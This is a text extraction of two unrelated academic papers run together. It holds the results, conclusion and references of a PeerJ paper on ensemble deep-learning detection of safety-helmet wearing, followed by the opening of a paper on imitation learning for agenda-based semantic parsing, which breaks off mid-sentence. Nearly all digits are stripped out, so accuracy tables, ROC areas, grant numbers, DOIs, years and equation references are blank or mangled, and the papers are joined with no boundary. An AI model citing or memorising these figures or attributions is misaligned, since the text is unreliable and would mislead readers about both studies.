∗ c) alone in algo. . function c(at,i,w∗c) is basically a cnn model, which requires only one target in an image, so we select over , images from the training set, cropped the target according to the corresponding anchor labels and get , images with only one target in each image. we select , images as training data for cnn, and the other , images as a validation set to detect the accuracy of cnn, also the cropped images are divided into two sets, people wearing helmets and without wearing helmets. in addition, we rotate some images to get richer training samples. with cross-validation, we choose to use four pairs of convolution and pooling layers, of which the first layer and the size of the convolution kernel of the second convolution layer are [ , ], and the size of the convolution kernel of the third and fourth convolution layers is [ , ]. the precision rate of the final two-class cnn reached . % when we use it to test the validation set of cnn. the roc curve on the training set is shown in fig. . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure roc with respect to a_s and c_s <!–[if !msequation]–> <!–[endif]–>. full-size doi: . /peerjcs. /fig- accuracy of ensemble method s(csf,csc,α∗). the roc curve coverage areas of faster cnn and at , cc are . and . , respectively. the ensemble method can further improve the accuracy of the final result. among the data, cf and cc are the results from two base methods, respectively, and the area is the size of the target frame. obviously, cf and cc can be used as the characteristic values of the ensemble method. we test the trained model, and the area under the roc curve coverage is larger, becoming . . the roc curve on the training set is shown in fig. . obviously, the roc curve covered by the ensemble method has the largest coverage area, which proves that the ensemble method is effective in our model. comparison of different algorithms. in this part, we demonstrate the effectiveness of our ensemble framework by combining faster rcnn and tiny face+cnn together with roc curve and pr curve. the roc and pr curves are calculated from testing results through -fold cross-validation as figs. and . from figs. and , we can see that combination with our framework (in green) is better than single algorithms (in black and orange). our framework can also gain the largest area under the roc curve ( . ) in fig. , and the largest area under the pr curve ( . ), namely the map score. it means our framework works best on average over all the possible threshold choices. tables and reveals a similar phenomenon when a reasonable threshold is chosen. it indicates that, with a well-chosen threshold, our framework works better than others in terms of tpr, fpr,fnr, precision, and recall. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison with roc. full-size doi: . /peerjcs. /fig- figure comparison with pr. full-size doi: . /peerjcs. /fig- fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison with tpr, fpr, fnr. algorithm true positive rate false positive rate false negative rate faster rcnn . % . % . % tinyface + cnn . % . % . % faster rcnn + tiny face + cnn . % . % . % table comparison with precision and recall. algorithm precision recall faster rcnn . % . % tiny face + cnn . % . % faster rcnn + tiny face + cnn . % . % figure comparison with roc for integrating mobilenet and tiny face. full-size doi: . /peerjcs. /fig- our framework can also be used to integrate other complementary deep learning methods to improve their performance. as an example, we use our framework to combine mobilenet and tinyface+cnn, and compare the integrated results with single algorithms. the performance is shown in figs. and . similar to the previous case, the algorithm performance is generally improved. our framework also works well when a specific threshold is chosen, as shown in tables and . through these experiments, we can find that the integrated framework for two complementary models can improve the performance of single algorithms by increasing fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison with pr for integrating mobilenet and tiny face. full-size doi: . /peerjcs. /fig- table comparison with tpr, fpr, fnr for integrating mobilenet and tiny face. algorithm true positive rate false positive rate false negative rate mobilenet . % . % . % tinyface + cnn . % . % . % mobilenet + tiny face + cnn . % . % . % table comparison with precision and recall for integrating mobilenet and tiny face. algorithm precision recall mobilenet . % . % tiny face + cnn . % . % mobilenet + tiny face + cnn . % . % the true positive rate, the precision rate, and the recall rate, while reducing the false positive rate and false negative rate. discussion the detection accuracy of a single model is usually not a satisfactory, so we use an ensemble method to integrate models to get better results. considering complementary behaviors of different algorithms, using an ensemble method for integration can effectively improve the accuracy of the detection results. for example, through our experiments, we can use fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. tiny face model with cnn to overcome the shortcomings that the faster rcnn model possesses when detecting small faces. although the proportion of small faces in the test set of this experiment is not very large, the missing rate is still one percent lower than that of a single model. in the test set with a large proportion of small faces, the detection accuracy of the integrated model can be improved further. conclusion when the detection accuracy of a single deep learning model could not meet the demand for helmet-wearing detection, we can integrate a complementary model with it to get better results. in addition, our framework can make single algorithms more robust to data sets from different scenarios, because it can utilize the advantage of the complementary algorithms. by analyzing a variety of object detection models, we find that many models are difficult to achieve high-precision for helmet-wearing detection in different scenarios. therefore, we carefully select two complementary base models and add additional modules to make them suitable for helmet-wearing detection. we ensemble the base models and build a more powerful helmet-wearing detection algorithm to further improve the detection capability. our approach can be accelerated by gpu and be deployed on distributed computers to reduce processing time, and thus, can be useful in real-world scenarios. in the future, the model can also be extended by integrating additional features or models and upgraded to mixed neural network models. additional information and declarations funding this work was supported by the national natural science foundation of china (no. ), the natural science foundation of zhejiang province (no. lgg f ), the ningbo science and technology innovation project (no. b ), and the qianjiang talent plan (no. qjd ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national natural science foundation of china: . natural science foundation of zhejiang province: lgg f . ningbo science and technology innovation project: b . qianjiang talent plan: qjd . competing interests the authors declare there are no competing interests. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • zheming fan and chengbin peng conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • licun dai conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • feng cao, jianyu qi and wenyi hua performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code is available as a supplemental file. the data set is available at github: https://github.com/njvisionpower/safety-helmet- wearing-dataset. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references anonymous. . safety helmet wearing-dataset. available at https://github.com/ njvisionpower/safety-helmet-wearing-dataset (accessed on august ). bo y, huan q, huan x, rong z, hongbin l, kebin m, weizhong z, lei z. . helmet detection under the power construction scene based on image analysis. in: ieee th international conference on computer science and network technology (iccsnt). piscataway: ieee, – . choudhury t, aggarwal a, tomar r. . a deep learning approach to helmet detection for road safety. journal of scientific and industrial research ( ): – . donahue j, jia y, vinyals o, hoffman j, zhang n, tzeng e, darrell t. . a deep convolutional activation feature for generic visual recognition. berkeley: uc berkeley & icsi. feng x, jiang y, yang x, du m, li x. . computer vision algorithms and hardware implementations: a survey. integration : – doi . /j.vlsi. . . . freund y, schapire re. . a decision-theoretic generalization of on-line learning and an application to boosting. journal of computer and system sciences ( ): – doi . /jcss. . . fukushima k, miyake s. . neocognitron: a self-organizing neural network model for a mechanism of visual pattern recognition. in: competition and cooperation in neural nets. berlin, heidelberg: springer, – . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information https://github.com/njvisionpower/safety-helmet-wearing-dataset https://github.com/njvisionpower/safety-helmet-wearing-dataset http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://github.com/njvisionpower/safety-helmet-wearing-dataset https://github.com/njvisionpower/safety-helmet-wearing-dataset http://dx.doi.org/ . /j.vlsi. . . http://dx.doi.org/ . /jcss. . http://dx.doi.org/ . /peerj-cs. garcia-garcia a, orts-escolano s, oprea s, villena-martinez v, garcia-rodriguez j. . a review on deep learning techniques applied to semantic segmentation. arxiv preprint. arxiv: . . girshick r. . fast r-cnn. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . girshick r, donahue j, darrell t, malik j. . rich feature hierarchies for accurate object detection and semantic segmentation. in: proceedings of the ieee conference on computer vision and pattern recognition. – . hu p, ramanan d. . finding tiny faces. in: proceedings of the ieee conference on computer vision and pattern recognition. – . krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep convolu- tional neural networks. communications of the acm ( ): – . lecun y, bottou l, bengio y, haffner p. . gradient-based learning applied to docu- ment recognition. proceedings of the ieee ( ): – doi . / . . li k, zhao x, bian j, tan m. a. automatic safety helmet wearing detection. in: ieee th annual international conference on cyber technology in automation, control, and intelligent systems (cyber). piscataway: ieee, – . li j, liu h, wang t, jiang m, wang s, li k, zhao x. b. safety helmet wearing detec- tion based on image processing and machine learning. in: ninth international conference on advanced computational intelligence (icaci). piscataway: ieee, – . liu bc, ivers r, norton r, boufous s, blows s, lo sk. . helmets for preventing injury in motorcycle riders. cochrane database of systematic reviews :cd doi . / .cd .pub . liu xh, ye xn. . skin color detection and hu moments in helmet recognition research. journal of east china university of science and technology : – . long x, cui w, zheng z. . safety helmet wearing detection based on deep learning. in: ieee rd information technology, networking, electronic and automation control conference (itnec). piscataway: ieee, – . redmon j, divvala s, girshick r, farhadi a. . you only look once: unified, real- time object detection. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . ren s, he k, girshick r, sun j. . faster r-cnn: towards real-time object detection with region proposal networks. in: advances in neural information processing systems. – . rubaiyat ah, toma tt, kalantari-khandani m, rahman sa, chen l, ye y, pan cs. . automatic detection of helmet uses for construction safety. in: ieee/wic/acm international conference on web intelligence workshops (wiw). piscataway: ieee, – . schapire re. . the strength of weak learnability. machine learning ( ): – . shi h, chen x, yang y. . safety helmet wearing detection method of improved yolov . computer engineering and applications : – doi . /j.issn. - . - . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . / .cd .pub http://dx.doi.org/ . /j.issn. - . - http://dx.doi.org/ . /peerj-cs. siebert fw, lin h. . detecting motorcycle helmet use with deep learning. accident analysis & prevention : doi . /j.aap. . . thompson dc, rivara f, thompson r. . helmets for preventing head and facial injuries in bicyclists. cochrane database of systematic reviews ( ):cd doi . / .cd . world health organization. . helmets: a road safety manual for decision-makers and practitioners. geneva: world health organization. yunbo liu, huang h. . research on monitoring of workers’ helmet wearing at the construction site. electronic science and technology ( ): – . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.aap. . http://dx.doi.org/ . / .cd http://dx.doi.org/ . /peerj-cs. imitation learning of agenda-based semantic parsers jonathan berant stanford university yonatan@cs.stanford.edu percy liang stanford university pliang@cs.stanford.edu abstract semantic parsers conventionally construct logical forms bottom-up in a fixed order, re- sulting in the generation of many extraneous partial logical forms. in this paper, we com- bine ideas from imitation learning and agenda- based parsing to train a semantic parser that searches partial logical forms in a more strate- gic order. empirically, our parser reduces the number of constructed partial logical forms by an order of magnitude, and obtains a x- x speedup over fixed-order parsing, while main- taining comparable accuracy. introduction semantic parsing, the task of mapping natural language to semantic representations (e.g., log- ical forms), has emerged in recent years as a promising paradigm for developing question an- swering systems (zelle and mooney, ; zettle- moyer and collins, ; wong and mooney, ; kwiatkowski et al., ; liang et al., ) and other natural language interfaces (zettlemoyer and collins, ; tellex et al., ; matuszek et al., ). recently, there have been two ma- jor trends: the first is to scale semantic parsing to large knowledge bases (kb) such as freebase (cai and yates, ; kwiatkowski et al., ; berant and liang, ). the second is to learn semantic parsers without relying on annotated logical forms, but instead on their denotations (answers) (clarke et al., ; liang et al., ); this lessens the anno- tation burden and has been instrumental in fueling the first trend (berant et al., ). what city was abraham lincoln born in > m type.city u placeofbirthof.abelincoln type.loc u containedby.lincolntown . . . abelincoln lincolntown usslincoln . . . type.city type.loc . . . placeofbirthof placeslived . . . figure : a parsing chart for the utterance “what city was abraham lincoln born in”. numbers in chart cells indicate the number of possible semantic parses constructed over that span, and arrows point to some of the logical forms that were con- structed. there are more than one million possible semantic parses for this utterance. in this paper, we are interested in training seman- tic parsers from denotations on large kbs. the chal- lenge in this setting is that the vocabulary of the target logical language often contains thousands of logical predicates, and there is a mismatch between the structure of the natural language and the logical language. as a result, the space of possible seman- tic parses for even a short utterance grows quickly. for example, consider the utterance “what city was abraham lincoln born in”. figure illustrates the number of possible semantic parses that can be con- structed over some of the utterance spans. just by combining semantic parses over the spans “city”, “lincoln” and “born” we already obtain · · possible parses; at the root, we get over a million parses. the ambiguity of language thus results in a even when type constraints are used to prune parses, we still produce more than a million possible parses at the root. root:type.city u placeofbirthof.abelincoln what set:type.city city was set:placeofbirthof.abelincoln entity:abelincoln abraham lincoln binary:placeofbirthof born in join intersect lex lex lex figure : an example semantic parse, or derivation, for the utterance “what city was abraham lincoln born in”. each node in the tree has a category (e.g., entity) and a logical form (e.g., abelincoln). hard search problem. to manage this combinatorial explosion, past approaches (krishnamurthy and mitchell, ; kwiatkowski et al., ; berant et al., ) used beam search, where the number of parses (see fig- ure ) for each chart cell (e.g., (set, : )) is capped at k. typical bottom-up parsing is employed, where we build all parses for spans of length n before n + , etc. this fixed-order parsing strategy con- structs many unnecessary parses though. for ex- ample, it would create k parses for the category entity and the span over “lincoln”, generating the logical form usslincoln, although it is unlikely that this entity would be in the final logical form. to overcome the problems with fixed-order pars- ing, we turn to agenda-based parsing (kay, ; caraballo and charniak, ; klein and manning, ; pauls and klein, ; auli and lopez, ). in agenda-based parsing, an agenda (priority queue) holds partial parses that can be constructed next. at each step, the parse with the highest priority is popped from the agenda and put into the chart. this gives the parser full control over the sequence of parses constructed. but importantly, agenda-based parsing requires a good scoring function that can rank not just full parses but also partial parses on the agenda. how do we obtain such a scoring function? to this end, we borrow ideas from imitation learn- ing for structured prediction (daume et al., ; ross et al., ; goldberg and nivre, ; chang et al., ). specifically, we cast agenda-based se- mantic parsing as a markov decision process, where the goal is to learn a policy, that given a state (i.e., the current chart and agenda), chooses the best next action (i.e., the parse to pop from the agenda). the supervision signal is used to generate a sequence of oracle actions, from which the model is trained. our work bears a strong resemblance to jiang et al. ( ), who applied imitation learning to agenda- based parsing, but in the context of syntactic pars- ing. however, two new challenges arise in seman- tic parsing. first, syntactic parsing assumes gold parses, from which it is easy to derive an oracle ac- tion sequence. in contrast, we train from question- answer pairs only (rather than parse trees or even logical forms), so generating an oracle sequence is more challenging. second, semantic parsers explore a much larger search space than syntactic parsers, due to the high level of uncertainty when translating to logical form. thus, we hold a beam of parses for each chart cell, and modify learning for this setup. we gain further efficiency by introducing a lazy agenda, which reduces the number of parses that need to be scored. for example, the single action of processing “born”, requires placing logical forms on the agenda, although only few of them will be used. our lazy agenda holds derivation streams, which implicitly represent a (possibly in- finite!) group of related parses as a single agenda item, and lazily materialize parses as needed. em- pirically, this reduces the number of parses that are scored at training time by %. last, we make modeling contributions by aug- menting the feature set presented by berant et al. ( ) with new features that improve the mapping of phrases to kb predicates. we evaluate our agenda-based parser on the we- bquestions dataset (berant et al., ) against a fixed-order parser, and observe that our parser re- duces the number of parsing actions by an order of magnitude, achieves a x- x speedup, and obtains a comparable accuracy of . %. to conclude, this paper describes three contribu- tions: first, a novel agenda-based semantic parser that learns to choose good parsing actions, train- ing from question-answer pairs only; second, a lazy agenda that packs parses in streams and reduces the number of generated parses; last, modeling changes that substantially improve accuracy. semantic parsing task while our agenda-based semantic parser applies more broadly, our exposition will be based on our primary motivation, question answering on a knowl- edge base. the semantic parsing task is defined as follows: given (i) a knowledge base (kb) k, (ii) a grammar g (defined shortly), and (iii) a training set of question-answer pairs {(xi,yi)}ni= , output a se- mantic parser that maps new questions x to answers y via latent logical forms z. we now briefly describe the kb and logical forms used in this paper. let e denote a set of entities (e.g., abelincoln), and let p denote a set of properties (e.g., placeofbirthof). a knowledge base k is a set of assertions (e ,p,e ) ∈ e × p × e (e.g., (hodgenville,placeofbirthof,abelincoln)). we use the freebase kb (google, ), which has m entities, k properties, and m assertions. to query the kb, we use the logical language simple λ-dcs. in simple λ-dcs, an entity (e.g., abelincoln) denotes the singleton set containing that entity; this is a special case of a unary pred- icate. a property (a special case of a binary predicate) can be joined with a unary predicate; e.g., placeofbirthof.abelincoln denotes all en- tities that are the place of birth of abraham lin- coln. we also have intersection: type.city u placeofbirthof.abelincoln denotes the set of en- tities that are both cities and the place of birth of abraham lincoln. we write jzkk for the denotation of a logical form z with respect to a kb k. for a formal description of λ-dcs, see liang ( ). grammars and semantic functions since we are learning semantic parsers from deno- tations, we cannot induce a grammar from provided logical forms (kwiatkowski et al., ). instead, we assume a small and flexible grammar that spec- ifies the space of logical forms. the grammar con- sists of a backbone cfg, but is atypical in that each rule is augmented with a semantic (composition) function that produces a varying number of deriva- tions using arbitrary context. this flexibility pro- vides procedural control over the generation of logi- cal forms. formally, a grammar is a tuple (v,n ,r), where v is a set of terminals (words), n is a set of cate- gories (such as binary, entity, set and root in figure , where root is the root category), and r is a rule set of binary and unary rules, explained below. a binary rule r ∈ r has the form a → b c [f], where a ∈ n is the left-hand-side, b c ∈ n is the right-hand-side (rhs), and f is a semantic func- tion, explained below. given an utterance x, the grammar defines a set of derivations (semantic parse trees) over every span xi:j = (wi,wi+ ,. . . ,wj− ). define d to be the set of all derivations, and let dai:j be a derivation over the span xi:j of category a. given the deriva- tions dbi:k and d c k:j and the rule r = a → b c [f], the semantic function f : d × d → d pro- duces a set of derivations f(dbi:k,d c k:j) over xi:j with category a. in words, the semantic func- tion takes two child derivations as input and pro- duces a set of candidate output derivations. for each output derivation d, let d.r be the rule used (set → entity binary[join]) and d.z be the logical form constructed by f, usually created by combining the logical forms of the child deriva- tions (placeofbirthof.abelincoln). this com- pletes our description of binary rules; unary rules a → b [f] and lexical rules a → w [f] are handled similarly, where w ∈v+ is a sequence of terminals. figure demonstrates the flexibility of seman- tic functions. the join semantic function takes a derivation whose logical form is a binary predicate, and a derivation whose logical form is a unary pred- icate, and performs a join operation. lex takes a derivation representing a phrase and outputs many candidate derivations. intersect takes two deriva- tions and attempts to intersect their logical forms (as defined in section ). in this specific case, no out- put derivations are produced because the kb types for type.city and releasedateof.lincolnfilm do not match. in contrast with cfg rules for syntactic pars- ing, rules with semantic functions generate sets of derivations rather than a single derivation. we allow semantic functions to perform arbitrary operations on the child derivations, access external resources such as freebase search api and the kb. in prac- tice, our grammar employs semantic functions; in addition to join, lex, and intersect, we use bridge, which implements the bridging operation (see section ) from berant et al. ( ), as well as ones that recognize dates and filter derivations based on part-of-speech tags, named entity tags, etc. join ( entity:abelincoln abraham lincoln , binary:placeofbirthof born ) = { set:placeofbirthof.abelincoln entity:abelincoln abraham lincoln binary:placeofbirthof born } lex( lincoln ) = { entity:abelincoln lincoln , entity:lincolnfilm lincoln , ... } intersect ( set:type.city city , set:releasedateof.lincolnfilm abraham lincoln born ) = {} figure : a semantic function (we show join, lex and intersect) takes one or two child derivations and returns a set of possible derivations. fixed-order parsing we now describe fixed-order parsing with beam search, which has been the common practice in past work (krishnamurthy and mitchell, ; kwiatkowski et al., ; berant et al., ). let x be the input utterance. we call derivations droot :|x| , spanning the utterance x and with root cate- gory, root derivations, and all other derivations par- tial derivations. given a scoring function s : d → r, a bottom-up fixed-order parser iterates over spans xi:j of increasing length n and categories a ∈ n , and uses the grammar to generate derivations based on derivations of subspans. we use beam search, in which for every span xi:j and every category a we keep a beam that stores up to k derivations in a chart cell hai:j (where different derivations usually correspond to different logical forms). we denote by h the set of derivations in any chart cell. a fixed-order parser is guaranteed to compute the k highest-scoring derivations if the following two conditions hold: (i) all semantic functions return ex- actly one derivation, and (ii) the scoring function decomposes—that is, there is a function srule : r→ r such that for every rule r = a → b c [f], the score of a derivation produced by the rule is s(dai:j) = s(d b i:k)+s(d c k:j)+srule(r). unfortunately, the two conditions generally do not hold in seman- tic parsing. for example, the intersect function returns an empty set when type-checking fails, vi- olating condition (i), and the scoring function s of- ten depends on the denotation size of the constructed logical form, violating condition (ii). in general, we want the flexibility of having the scoring function depend on the logical forms and sub-derivations, and therefore we will not be concerned with exactness in this paper. note that we could augment the cat- egories n with the logical form, but this would in- crease the number of categories exponentially. model. we focus on linear scoring functions: s(d) = φ(d)>θ, where φ(d) ∈ rf is the feature vector and θ ∈ rf is the parameter vector to be learned. given any set of derivations d ⊆ d, we can define the corresponding log-linear distribution: pθ(d | d) = exp{φ(d)>θ}∑ d′∈d exp{φ(d′)>θ} . ( ) learning. the training data consists of a set of utterance-denotation (question-answer) pairs {(xi,yi)}ni= . to learn θ, we use an online learn- ing algorithm, where on each (xi,yi), we use beam search based on the current parameters to construct a set of root derivations di = hroot :|x| , and then take a gradient step on the following objective: oi(θ) = log p(yi | xi) ( ) = log ∑ d∈di pθ(d | di)r(d) + λ‖θ‖ , ( ) where r(d) ∈ [ , ] is a reward function that mea- sures the compatibility of the predicted denotation jd.zkk and the true denotation yi, . we marginalize over latent derivations, which are weighted by their compatibility with the observed denotation yi. the main drawback of fixed-order parsing is that to obtain the k root derivations di, the parser must first construct k derivations for all spans and all cat- egories, many of which will not make it into any root derivation d ∈ di. next, we describe agenda-based parsing, whose goal is to give the parser better con- trol over the constructed derivations. jd.zkk and yi are both sets of entities, so r is the f score. remove add figure : a schematic illustration of a executing a parsing action, specified by a derivation on the agenda. first, we remove it from the agenda and put it in the chart. then, combine it with other chart derivations to produce new derivations, which are added back to the agenda. algorithm agenda-based parsing : procedure parse(x) : initagenda() : while |q| > ∧|hroot :|x| | < k do : dai:j ← choose derivation from q : executeaction(dai:j) : choose and return derivation from hroot :|x| : function executeaction(dai:j) : remove dai:j from q : if |hai:j| < k then : hai:j.add(d a i:j) : combine(dai:j) : function combine(dai:j) : for k > j and r = b → ac [f] ∈r do : for dcj,k ∈ h c j:k do : q.addall(f(dai:j,d c j:k)) : for k < i and r = b → c a [f] ∈r do : for dck,i ∈ h c k:i do : q.addall(f(dck:i,d a i:j)) : function initagenda() : for a → xi:j [f] ∈r do : q.addall(f(xi:j)) agenda-based parsing the idea of using an agenda for parsing has a long history (kay, ; caraballo and charniak, ; pauls and klein, ). an agenda-based parser controls the order in which derivations are con- structed using an agenda q, which contains a set of derivations to be processed. at each point in time the state of the parser consists of two sets of derivations, the chart h and the agenda q. each parsing action chooses a derivation from the agenda, moves it to the chart, combines it with other chart derivations, and adds new derivations to the agenda (figure ). algorithm describes agenda-based parsing. the algorithm shows binary rules; unary rules are treated similarly. first, we initialize the agenda by applying all rules whose rhs has only terminals, adding the resulting derivations to the agenda. then, we per- form parsing actions until either the agenda is empty or we obtain k root derivations. on each action, we first choose a derivation dai:j to remove from q and add it to hai:j, unless h a i:j already has k derivations. then, we combine dai:j with all derivations dj:k to the right and dk:i to the left. upon termination, we perform a final action, in which we return a single derivation from all constructed root derivations. the most natural way to choose an agenda deriva- tion (and the root derivation in the final action) is by taking the highest scoring derivation d = arg maxd∈q s(d). most work on agenda-based pars- ing generally assumed that the scoring function s is learned separately (e.g., from maximum likelihood estimation of a generative pcfg). furthermore, they assumed that s satisfies the decomposition property (section ), which guarantees obtaining the high- est scoring root derivation in the end. we, on the other hand, make no assumptions on s, and follow- ing jiang et al. ( ), we learn a scoring function that is tightly coupled with agenda-based parsing. this is the topic of the next section. learning a scoring function the objective in ( ) is based on only a distribution over root derivations. thus, by optimizing it, we do not explicitly learn anything about partial deriva- tions that never make it to the root. consider the derivation in figure over the phrase “lincoln” with the logical form usslincoln. if none of the k root derivations contains this partial derivation, ( ) will not penalize it, and we might repeatedly construct it even though it is useless. to discourage this, we need to be sensitive to intermediate parsing stages. . imitation learning we adapt the approach of jiang et al. ( ) for agenda-based syntactic parsing to semantic parsing. recall that a parsing state is s = (h,q), where h ⊆d is the chart and q ⊆d is the agenda. the available actions are exactly the derivations to keep the state space discrete, states do not include derivation scores. this is why in algorithm we keep a list of up to k derivations in every chart cell rather than a beam, which would require actions to depend on derivation scores. on the agenda q, and the successor state s′ is com- puted via executeaction() from algorithm . we model the policy as a log-linear distribution over (partial) agenda derivations q: pθ(a | s) = pθ(d = a | q), according to ( ). note that the state s only provides the support of the distribution; the shape depends on only features φ(a) of the chosen action a, not on other aspects of s. this simple param- eterization allows us to follow a policy efficiently: when we add a derivation a to the agenda, we insert it with priority equal to its score s(a) = φ(a)>θ. computing the best action arg maxa pθ(a | s) sim- ply involves popping from the priority queue. a history h = (s ,a , . . . ,at ,st+ ) (see fig- ure ) is a sequence of states and actions, such that s has an empty chart and an initial agenda, and st+ is a terminal state reached after performing the chart action in which we choose a root derivation at from hroot :|x| (algorithm ). the policy for choosing parsing actions induces a distribution over histories pθ(h) = ∏t t= pθ(at | st). at a high level, our policy is trained using imi- tation learning to mimic an oracle that takes a opti- mal action at every step (daume et al., ; ross et al., ). because in semantic parsing we train from questions and answers, we do not have access to an oracle. instead, we first parse x by sampling a history from the current policy pθ; let d∗ be the root derivation with highest reward out of the k root derivations constructed (see ( )). we then generate a target history htarget from d∗ using two ideas—local reweighting and history compression, which we ex- plain shortly. the policy parameters θ are then up- dated as follows: θ ← θ + η r(htarget) t∑ t= δt(htarget), ( ) δt(h) = ∇θ log pθ(at | st) ( ) = φ(at)−epθ(a′t|st)[φ(a ′ t)]. the reward r(h) = r(at ) ∈ [ , ] measures the compatibility of the returned derivation (see ( )), and η is the learning rate. note that while our fea- note that unlike standard policy gradient, our updates are not invariant (even in expectation) to shifting the reward by a constant. our updates do not maximize reward, but the reward merely provides a way to modulate the magnitude of the up- dates. st− st st+ at− at figure : a schematic illustration of a (partial) history of states and actions. each ellipse represents a state (chart and agenda), and the red path marks the actions chosen. tures φ(a) depend on the action only, the update rule takes into account all actions that are on the agenda. local reweighting. given the reference d∗, let i[a in d∗] indicate whether an action a is a sub- derivation of d∗. we sample htarget from the lo- cally reweighted distribution p+wθ (a | s) ∝ pθ(a | s)·exp{β i[a in d∗]} for some β > . this is a mul- tiplicative interpolation of the model distribution pθ and the oracle. when β is high, this reduces to sam- pling from the available actions in d∗. when no or- acle actions are available, this reduces to sampling from pθ. the probability of a history is defined as p+wθ (h) = ∏t t= p +w θ (at | st). recall we construct k root derivations. a prob- lem with local reweighting is that after adding d∗ to the chart, there are no more oracle actions on the agenda and all subsequent actions are simply sam- pled from the model. we found that updating to- wards these actions hurts accuracy. to avoid this problem, we propose performing history compres- sion, described next. history compression. given d∗, we can define for every history h a sequence of indices (t , t , . . .) such that i[ati in d ∗] = for every i. then, the compressed history c(h) = (st ,at ,st ,at , . . .) is a sequence of states and actions such that all actions choose sub-derivations of d∗. note that c(h) is not a “real history” in the sense that tak- ing action ati does not necessarily result in state sti+ . in figure , the compressed history c(h) = (s ,a ,s ,a ,s ,a ,s ). we can now sample a target history htarget for ( ) from a distribution over compressed histories, a = d ∗ h : a a s s s s s a a a a figure : an example history of states and actions, where ac- tions that are part of the reference derivation d∗ = a are in red. the compressed history is c(h) = (s ,a ,s ,a ,s ,a ,s ). algorithm learning algorithm procedure learn({xi,yi}ni= ) θ ← for each iteration τ and example i do h ← parse(pθ,xi) d∗ ← chooseoracle(h ) htarget ← parse(p+cwθ ,xi) θ ← θ + ητ,i ·r(htarget) ∑t t= δt(htarget) p+cθ (h) = ∑ h′:c(h′)=h pθ(h), where we marginal- ize over all histories that have the same compressed history. to sample from p+cθ , we sample h ′ ∼ pθ and return htarget = c(h′). this will provide a his- tory containing only actions leading to the oracle d∗. in our full model, we sample a history from p+cwθ , which combines local reweighting and his- tory compression: we sample h′ ∼ p+wθ and re- turn htarget = c(h′). we empirically analyze local reweighting and history compression in section . in practice, we set β large enough so that the be- havior of p+cwθ is as follows: we first construct the reference d∗ by sampling oracle actions. after con- structing d∗, no oracle actions are on the agenda, so we construct k − more root derivations, sampling from pθ (but note these actions are not part of the re- turned compressed history). finally, the last action chooses d∗ from the k derivations. algorithm summarizes learning. we initialize our parameters to zero, and then parse each exam- ple by sampling a history from pθ. we choose the derivation with highest reward in hroot :|x| as the ref- erence derivation d∗. this defines p+cwθ , which we sample from to update parameters. the learning rate ητ,i is set using adagrad (duchi et al., ). . related approaches our method is related to policy gradient in reinforce- ment learning (sutton et al., ): if in ( ), we sample from the model distribution pθ without an oracle, then our update is exactly the policy gradi- ent update, which maximizes the expected reward epθ(h) [r(h)]. we do not use policy gradient since the gradient is almost zero during the beginning of training, leading to slow convergence. this corrob- orates jiang et al. ( ). our method extends jiang et al. ( ) to seman- tic parsing, which poses the following challenges: (a) we train from denotations, and must obtain a ref- erence to guide learning. (b) to combat lexical un- certainty we maintain a beam of size k in each pars- ing state (we show this is important in section ). (c) we introduce history compression, which focuses the learner on the actions that produce the correct derivation rather than incorrect ones on the beam. interestingly, jiang et al. ( ) found that imitation learning did not work well, and obtained improve- ments from interpolating with policy gradient. we found that imitation learning worked well, and in- terpolating with policy gradient did not offer further improvements. a possible explanation is that the uncertainty preserved in the k derivations in each chart cell allowed imitation learning to generalize properly, compared to jiang et al. ( ), who had just a single item in each chart cell. lazy agenda as we saw in section , a single semantic function (e.g., lex, bridge) can create hundreds of deriva- tions. scoring all these derivations when adding them to the agenda is wasteful, because most have low probability. in this section, we assume semantic functions return a derivation stream, i.e., an itera- tor that lazily computes derivations on demand. our lazy agenda g will hold derivation streams rather than derivations, and the actual agenda q will be defined only implicitly. the intuition is similar to lazy k-best parsing (huang and chiang, ), but is applied to agenda-based semantic parsing. our main assumption is that every derivation stream g = [d ,d , . . . ], is sorted by decreasing score: s(d ) ≥ s(d ) ≥ ··· (in practice, this is only approximated as we explain at the end of this sec- tion). we define the score of a derivation stream as s(g) = s(d ). at test time the only change to al- gorithm is in line , where instead of popping the g s(g[ ]) |g| u [d ] . [d , d , d , . . . ] . g s(g[ ]) |g| u [d ] . [d ] . [d ] . [d , . . . ] − . figure : unrolling a derivation where � = . and |g+| = . the stream in red on the left violates the stopping condition, and so we unroll two derivations until all streams satisfy the condition. highest scoring derivation, we pop the highest scor- ing derivation stream and process the first derivation on the stream. then, we featurize and score the next derivation on the stream if the stream is not empty, and push the stream back to the agenda. this guar- antees we will 